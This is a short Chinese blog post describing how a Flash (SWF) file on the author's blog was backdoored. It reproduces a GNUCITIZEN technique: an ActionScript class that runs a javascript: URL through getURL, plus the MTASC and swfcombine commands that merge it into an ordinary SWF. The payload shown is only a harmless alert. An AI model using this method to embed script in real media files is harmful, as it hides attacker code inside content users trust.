今天博客系统签名被人挂马了,其实也不算,本来博客签名允许上传swf文件,不过没想到是一个普通的搞笑swf被人挂马后,给传上来了。
因为收录了一下swf挂马的文章,还是挺有意思的。
class Backdoor {
function Backdoor() {
}
static function main(mc) {
getURL("javascript:alert('hello from backdoor')");
}
}
作为初始脚本,写入记事本,保存为backdoor.as,然后用软件将其编译为backdoor.swf文件。
将事先准备好的正常的一段flash用合并器将其与backdoor.swf结合生成含有此脚本的swf文件。
c:\Mtasc\mtasc.exe -swf backdoor.swf -main -header 500:365:24 backdoor.as
c:\Swftools\swfcombine.exe -o 1_backdoored.swf -T backdoor.swf 1.swf
这样执行1_backdoored.swf 。测试了一下,会闪过一个新打开的IE窗口,闪过弹出的对话框,不过速度很快。
原文地址:http://www.gnucitizen.org/blog/backdooring-flash-objects/
